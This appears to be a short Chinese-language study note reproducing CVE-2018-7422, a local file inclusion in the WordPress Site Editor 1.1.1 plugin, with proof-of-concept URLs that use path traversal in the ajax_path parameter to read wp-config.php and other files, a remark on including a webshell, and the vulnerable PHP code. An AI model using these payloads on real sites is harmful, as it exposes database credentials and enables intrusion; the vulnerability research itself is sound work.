# CVE-2018-7422 (Wordpress plugin SITE EDITOR 1.1.1) ###### tags: `CVE` `wordpress` 安裝插件 SITE EDITOR 1.1.1 手動安裝因為檔案太大了 POC: ``` URL http://localhost/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php GET參數ajax_path 這個參數可以本地包含一個文件。 poc: 這個會失敗 因為是PHP檔，會被解析，但今天是一句話馬的情況就不一樣了 http://localhost/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php 可以拿來查看文件 http://localhost/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../license.txt ``` ## 分析: 沒過濾，而且可以傳值控制 wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php ```if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){ require_once $_REQUEST['ajax_path']; ``` ## 心得: 好爽好簡單。